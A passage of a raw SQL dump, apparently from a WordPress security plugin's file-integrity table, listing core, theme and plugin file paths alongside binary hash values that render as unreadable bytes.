�}gK�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-toolkit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j4��=D�J�H','�Oo�P6�:|5/M�_�6#.y�Ύ�y(���','',0,'?'),('5fa\"w�m��P\0�?','wp-content/themes/newsmag/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$����|J�Ш}��2� ','��6}_DgĘp8J�ٯ���7��	����','',0,'?'),('!r�廣���f�9�','wp-content/themes/graphene/images/bg-block-button-hover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S#�l>s���<��X','=��sNrK�։��-Ę�y\0ۑ�uD�q&r�Z)_','',0,'?'),('\"w%�_��K\\��u�','wp-admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('&c�YD�#�P{+��','wp-includes/js/jquery/ui/effect-blind.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('-p&/�o��\\��-�','wp-content/themes/catch-flames/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�T��4}c��vps�','������A˲g3�d\'\r/��3I#�FM�I','',0,'?'),('.����W�����','wp-content/themes/wp-simple/inc/kirki/assets/images/3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z��6�\"��','/��F��Z�\n�W�i<\no��>D��]�����','',0,'?'),('<�B/��<ö�z:E','wp-content/themes/exoplanet/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�}�v��\0;s*�','\n�2�Ssc�@���r���f�vt��\Z���','',0,'?'),('A`�k{�n���/*ScN','wp-includes/js/dist/vendor/react-dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�JeN���uL��','��\"mO�=����E¹jas�lIJ�������','',0,'?'),('A�1i�~rA(�\\���','wp-content/themes/singularity/template-parts/content-discussion-topic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TE���8[��I8n�','�c�f� ��[�AYN�.�c���{���D','',0,'?'),('Nk}#bt#���','wp-content/themes/graphene/admin/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��aX�2�p�6�7(K','�0�m�]�8<)ֶj|����\0f,5w��q�nR','',0,'?'),('z��)�u�D���j�','wp-content/themes/chronus/template-parts/header/navigation-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0�ƢgL��1�i','z�զi}M08=�<�@����(Y���3�A��','',0,'?'),('}spK�� ��:�','wp-content/plugins/akismet/views/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eY�]�Z�.^<��&Un','�G�,|�8������i1��<2�,�8��+w','',0,'?'),('~�Fӡ�q���TMB�','wp-content/plugins/wp-cerber/assets/flags/ls.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�?\0��rɝ��E?�','�t?B��\0��{��!����e��Wh�ٲv��','',0,'?'),('�����Y����q�','wp-includes/customize/class-wp-customize-partial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J@�N-p<�1]\Z�n�','ƪ�㫾������s�uu��nΐ\0��V<1�r','',0,'?'),('���,H(b�_F�O','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�י_xL9�~h��\0','�H*+w�����Cy�	m�v�1R�2\ng�\\�','',0,'?'),('�2���M-q	,\"�\'@','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('��HVե�d��p�Vp','wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('�*K�w3�a@��','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*Wg_#%;pb]���','\"�+�v1�;�<���M_G���;=tD�%i`$','',0,'?'),('�_\'���Q�k`��*�','wp-content/themes/education-hub/third-party/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʔ�q�3��[�','���qa#T0��T�n=���8X\n�Bg%΀L�','',0,'?'),('�l��x��HÆ�','wp-content/themes/quicksand/js/flexslider/flexslider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E��N��6��\'��r','��;��Q��@\n�L+L��G���8�e�f�','',0,'?'),('��ґS�.N�6�mk�','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZI��%�nm�5','��K�!�l�̞�<�w�G	�x6����A\0fj','',0,'?'),('��\':���m�_X�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/smarty/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�7(�,N��','��w�/,�T�|U�Z�U9Ͱ��]��O��H�g�','',0,'?'),('�\n��UN~���\0m��','wp-includes/js/codemirror/csslint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�T��@��fI�au�0','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���Xs}��D�K�\0','�F\0A�5	I[�z��b̧�{���p�]�s�','',0,'?'),('�c\"ml� �Ǟ>o','wp-admin/images/wordpress-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�%�d���g���p','�\"�u�j-QE\0��[�gL�Z5�MD�:','',0,'?'),('�RMV��JR��a+�M','wp-content/themes/auberge/includes/tgmpa/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�N�1��s���	\r','�s}�%&�&�s��~�|�2,��\n����L)�m','',0,'?'),('lF�e�\"�|}�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o˽{=�װ<��):�_','J��ͺ %-���%Jj�6���~7�t{ g���','',0,'?'),('#���rk�B�/c��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/indent-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�ӈ�72q���','�2{�˒	�/y��ת��0���\'��-$','',0,'?'),('$%#��_�U�_d�','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�a2��%x�h�YB','p�����~���&�������W�OX(Û ','',0,'?'),('*�P�\rTm>5@h%�.','wp-content/themes/graduate/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�\Z�h��!Š\\B�T','_WN�g�-Ko���AB�C�|��|o.��0�ք','',0,'?'),('*�O�������i','wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�lh�¸�j�68��','V]�l��1W�+	{6v��ޣ��C���=��','',0,'?'),('-�x�~/o����{','wp-content/themes/advance/css/unminified/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g7q��709\r�3','�;B�h(oaї��4��if�c����b�;�2','',0,'?'),('=�NgÈ�����W;','wp-content/plugins/wp-cerber/assets/flags/ci.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�yd���2¹��','���.�=D	��dԢ���)�*k���,8Dˬ','',0,'?'),('@������4����','wp-content/themes/auberge/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�I�J>$V��WW�','���s\\�k�O/;_t3(���E�f��4��','',0,'?'),('D�� �2��K|&�','wp-admin/css/nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g^�C>��uJ�>�\Z','�V.��/�SV��9:_I:aldt�p���aue','',0,'?'),('Q�10�����G��,','wp-includes/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('g��xS�3l��\\��o','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlembedded/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�mN�\n����B�X','���Uz1,e:vu?n۽\Zo�\rþ�I�ȫ+�','',0,'?'),('tP��1>3�G�c��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/panel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�U�C��[���͍','��F�[Ho�f/�Gv�V�*u��7�L/���i��','',0,'?'),('x]u���V��ɶ�z��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/textile/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�A�J�[\Zs��E(','�v2���*� 6	-(/Ӡ[�t�1o�ٵ�t�w�','',0,'?'),('{�M��i�i2n��6�','wp-includes/js/jquery/ui/effect-highlight.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('}�]E�O�.\r��̇','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/vibrant-ink.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i����#�b��7','9����ݯx5��X�,V%��xΗc)�5\'�)','',0,'?'),('�@b��P��g��','wp-content/themes/saybusiness/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۂ�\0+��-�h]Q�4P�','��7[������/�ic�#2��&y�����0','',0,'?'),('�K\Z �}�ȑ�ׄː�','wp-content/plugins/wp-cerber/assets/flags/lb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',6uƤs%��D^P��)�','��!�sl��Q��_~m�I�n��G)���.','',0,'?'),('��1>��/�=K	�U','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/htmlembedded.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�E�8y�{���^��','��Q/:�(r{u���\0��kwVn��dT��PJX','',0,'?'),('�)&�M2�D�\rY�U^','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�����8v��w5ǿ','����Vs��y�f(����G�8�hM����\Z�j��','',0,'?'),('��o�+�-�G��','wp-content/themes/city-store/assets/js/html5.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��>�XP)��,a�','���O���`57DݟL��_?��������i��','',0,'?'),('��A��Fk�','wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_j]������RW','DŽܜ�6�\\���@���]ؿ��(��9�N	c','',0,'?'),('���Ϙ�s7��4��','wp-content/themes/simpleshift/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0^�\\�c�z��R��','��$�o��Z�X�\'ՍI�k�0�;ov<>�]��','',0,'?'),('���.Q}3��T�','wp-includes/Requests/Hooker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@%�a[ў/4��','t\r{�k�?i�k�C\nL��b�̇�Wy','',0,'?'),('�Z�u���iigԄ��','wp-includes/js/dist/nux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ꁥ�قH6K�&�x7��','-p� C��5s����5��s\"�^�C�����8','',0,'?'),('�B�)�?���f�	�\'','wp-content/themes/Endolf/js/tinynav.js',0,'8�f b�Yq�\"5M�tl�','8�f b�Yq�\"5M�tl�','F\"H\r�^Ƚ\"����#{M�\\���~�[Q(�d','',0,'?'),('�+�H�Oy�À��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-multicheck-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Abz�=��\\Z�p','���T�Wt�^Z\Z	U]\Z\Z%� ��[gxF','',0,'?'),('�<�ďPQP��N8e','wp-content/themes/brickyard/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�Z�S��:p��H�','��gi�5V�X����t��y{�|‹���','',0,'?'),('\r-8d媟zo<��̬w','wp-content/themes/chronus/assets/images/magazine-columns.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�HF���oţF�=','�Y��蠇�=���2��!1��e�գ��','',0,'?'),('\r7yG��V�MJz��0','wp-content/themes/graphene/images/sprite_h.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q4���X�Ƞ0b��Y','n@��G�.}$�iؾ�R��-%�Xg�^�Ix','',0,'?'),('\rE�lZ}�I��8�+V','wp-content/plugins/wp-cerber/assets/rateit2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�_��[r]s�T�j','�Uu8�X*O\'bS,���+�|tV֭�( S�','',0,'?'),('\rI���*K�����4�','wp-content/themes/Endolf/content.php',0,'i�b�j�&^�vN','i�b�j�&^�vN','@㝪���)�G����c�?��(#+\"\Z�[��-8','',0,'?'),('\rP:��#dY�.^_�`�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/preset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o����.�t����j','�����C��X���c���L����h�T4jj','',0,'?'),('\rP�\r.B���$��Nx�H','wp-content/themes/weblog/acmethemes/hooks/comment-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��IQ��Ϭ�b�\\#','�)��`4?K8�&J�>`����r}�A(�]Cd','',0,'?'),('\rP�4�����S���\n','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-typography-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�w)��VƊ��H�','�i\'��\n(�BK��.�P̕\"QY\0�x�\0�eC\'','',0,'?'),('\rT_9��\nD�u܌J��','wp-content/themes/simpleshift/inc/kirki/includes/lib/class-kirki-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6~�_�/��f����','��e|�TtĀk21�7��d�mr����Oꥆ�','',0,'?'),('\rU�j�zh�2/�9�fM','wp-admin/js/application-passwords.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iߞ=�%\\�����p�L4','\'й�1��]��uYїv�l�0���H�\\����','',0,'?'),('\rZ�Ŏ��A~','wp-content/themes/advance/parts/social-loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��f~�ˌ.����Us','�2x���(�R5���u��p�������','',0,'?'),('\r[O*XQ���g|�^�4�','wp-content/themes/catch-flames/inc/panel/customizer/upgrade-button/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k���b`�Z�pX�\\','\0�z��\rE����r%Q��_��y��9�X','',0,'?'),('\r_�V�3v.[�nM<','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/3024-day.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�vR�����݅��','���ɏ����5��/����)�z�v','',0,'?'),('\rxݍ�^���\Z���<;','wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/v�	h7�@A�h','P[ĝ�C1��֡?qt�����C�����w#','',0,'?'),('\ryY�	qi!Y�rB�h','wp-content/themes/Endolf/inc/sidebar-tab-widget.php',0,'���,_\Z�tM�ZjaW','���,_\Z�tM�ZjaW','����~R�	�I_7�ջd2��$�6,�','',0,'?'),('\rz�����D�D��','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SDRU���7}�','�n:kɆZ���/��|L���S����n�D.N','',0,'?'),('\r����X����+�-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ �Mϼ�V_�i�	��','��U�s����D�MÙ�d��(�\0��ā�~���','',0,'?'),('\r�vN��[B��&��SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M嬬�S�Ի�JP��','��H����焑;���#�O����/t��','',0,'?'),('\r�dI�#+p����j','wp-content/themes/catch-responsive/js/skip-link-focus-fix.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʝa���=q�x\0���m','�޲4��t�F���\Z)i��+i[����*x�','',0,'?'),('\r��<�:� -{��̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°�\nᄷ�\0�a��','`	\\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('\r�d���uQ�n�k','wp-content/themes/twentynineteen/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<2Q�.�%�|=�S�','$�?2���sȉ�F�G?TC?EkB��f� ��S�','',0,'?'),('\r�ҧxOz��z���h','wp-includes/class-wp-customize-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('\r��:�:���HH�:d','wp-admin/css/edit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�=Z��-�!?q#3�','�J墥��O������b�*�:e�š�P�','',0,'?'),('\r��;��:�s?H�$0W','wp-content/themes/edge/assets/sticky/sticky-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`n��Lf���','IV���b�y���R�F�{&�����ϊ9>Ϩ?\0-','',0,'?'),('\r�%����%�yS�`�','wp-includes/js/crop/cropper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('\rѪ1s1=��`(�y','wp-admin/options-head.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cV8A#h:e׭/��^','c҈��^$kR2\r=���ܫ���@g��2�','',0,'?'),('\rҗ�r׾� ���\n�\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�@���ޯ]��&','7aP��\\T����\"S�z���J�&b�ٸ®D�','',0,'?'),('\r�ա����73)�','wp-content/themes/graduate/tp-education/template-parts/content-single-testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n|�]wg�U&¥�U','p�jT�2\'=�|�X=�K�]-yx���-�3Y','',0,'?'),('\r�M��bC��B���_','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/coffeescript-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�\Z�KC	 k�q�ޟ�','c����[\"Wc�c�ł�?��av����','',0,'?'),('\0�[|��}��袄D�','wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV�@K����7�','����7y�^-��\'���<^?b�L���i=x�','',0,'?'),('�{����9�I�','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��ڮ9	%�{�\"�','�ڲ�����}ekA�����9_tu0{_.��','',0,'?'),('�&�ho�hj�9`','wp-content/themes/advance/inc/kirki/assets/css/kirki-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��Rnr�Oq�Je�*','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/<8uA��P','����ٚ�W��ct�GR�/�*]��z��3','',0,'?'),('$9����1BҬX�ǒ','wp-content/themes/graphene/template-twocolumnsright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�?����K҃��^','3��Y|�3�G�!���F$�����E�S�','',0,'?'),('*\r�V���Ϲ�@l$','wp-content/themes/education-hub/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�*��/�}�ҳ','[�^��VM�/��t\"�L-E!;\'���XR?s�i','',0,'?'),('-��~��Zr�ZLIP','wp-content/themes/lovecraft/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p&���le�~���WL','\n-��_�7}���,��a2&\"��)���)�h\\�','',0,'?'),('1mb�z憔n#�8��','wp-content/themes/hitmag/inc/customizer/custom-controls/class-upsell-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rpF5^UA4�ݕ','��.v\r&2��W8>�����uUV�,�\0��;6j','',0,'?'),('5�|�K��>��3�','wp-content/themes/edge/inc/settings/edge-common-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{9��:�_l��C��jk�','��ػ�%��u���<}] n�U��rz͞B(�,','',0,'?'),(';ɮg)@ˡ�œ���H','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/comment/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �T�m☴s����z','���37\ZZu&��G#̨\'��5:�H���e<�','',0,'?'),('@�R��i�3����}','wp-content/themes/graphene/images/headers/schematic-thumb.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d\\\n�o��Moq4�','��[�E\n7������W>f�C�h���-�]��O','',0,'?'),('J�X��@ъ��u�zb','wp-content/themes/university-hub/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wƦ�>��&_@��n','1m=	U\n��;���FY��\0,�\"�@7_F\'Y�x�n','',0,'?'),('W7��{(��;:P���?','wp-admin/includes/class-bulk-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A2�?������+Y��','�i���;�M3�U�P�<�XZ��z����','',0,'?'),('X��H奥(�:�Z�','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Iys��j�y��Ѩ_','8=Ի�(���H��&�uE\Zl}RZ��>Ol�x','',0,'?'),('\\U�L�rU�#�ƫh','wp-content/themes/catch-flames/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	B��KCF~��Q�/G�','�=�\nB7�Ŕ�R�ڴ[D�D��)Ъ��|�TR','',0,'?'),('\\d���;�ѳbI%@��','wp-content/plugins/wp-cerber/assets/flags/dk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K\n�l����7D!','%���w����r6�U^�/1���6�a��\'<b�B','',0,'?'),('^��� �lkB��K�','wp-content/plugins/wp-cerber/assets/flags/vg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�XBJ��\'2','`���G�a\02��%̛7�\\H�=gs�%��','',0,'?'),('a5�ͅB�_��s�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('go�s�V�;���\n$','wp-includes/js/tinymce/plugins/compat3x/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('�����d\n�����:','wp-content/themes/lovecraft/js/theme-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�~F�8����Dlz','�8a��J/VP���n�i����\n>\nL�m�','',0,'?'),('����a�z�9yQ�E�','wp-content/themes/wp-simple/assets/css/bootstrap-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l^2���i��Ag�~rG',';3m�A(oW�2�*��tC�v�K&<�&��r','',0,'?'),('�h�r\Z����;%e�-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�J��u;Q�Z6��','����\\MU��KhQ�w�C��i�V���J\'','',0,'?'),('����#����>�z�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/mode/simple.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�uT��i)�\n�4V�','k�d��E���M��(S$�Lh搖#L{.#c?�','',0,'?'),('��]P�Σ�$�\Z�','wp-content/themes/skt-pathway/left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yW�G�[\r�KfU�=','5�_��\'����](�޸A�&\Z�%�~	�[�+�','',0,'?'),('�����U��)��ʀ3G','wp-content/plugins/akismet/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u(Y�kR��S�','�%O�N+�84Nm�[�ւ���/f�wc���)\0p��','',0,'?'),('��oc���?�b��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/lib/class-kirki-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6~�_�/��f����','��e|�TtĀk21�7��d�mr����Oꥆ�','',0,'?'),('�\n\'t�+c�,�1����','wp-content/themes/newsmag/assets/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uIHh>8��R���~��','j�!��\"�A={>r�y����_��b��\0��','',0,'?'),('�\"��q&�ayU���','wp-content/themes/hitmag/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l\r���l�<�-��','a,�[���|�/��U�=*�!�C�Z~v-�t;','',0,'?'),('��ӯO�W�T�\nj','wp-content/themes/university-hub/inc/customizer/default.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�m���+��xUO@?�','բmә=�����0\r���3���Х��gr�','',0,'?'),('Ö���vh���l��P','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��ZobS\ng5����','\n�)�^��	����`-��/��3{):?�','',0,'?'),('� ��C�Y���','wp-includes/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B��	�O4AO7','',0,'?'),('�>�M�8� ٵ��|','wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('з���p���^���','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/spacing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�A�㕷ä��ݥ9�<','N�Jc\"�-S	oc(�P(�d������H~;','',0,'?'),('�ihOP[����f','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B�^.Q�iI�','Cc�qa\0>�I�1����?^����_7�c','',0,'?'),('��h���\Z�q���','wp-content/themes/catch-flames/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uUA��a�����','�\Z�l]5���~�u��3	�T�#F','',0,'?'),('�Hd�����o�CZ','wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&a���1��5b}1','�kZ���`��*5Yu�…�WB�-4Y?�{̯�','',0,'?'),('��\"\rJ\04��\'i�','wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃ�D����)�a�n','`��)C�E�L�d�X\\�&F-�V7�+1�SA','',0,'?'),('�	���n`)\'	�','wp-content/themes/catch-flames/inc/catchflames-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=2k4��e�@�','���~�1�9:^K��ﭭ���A�_','',0,'?'),('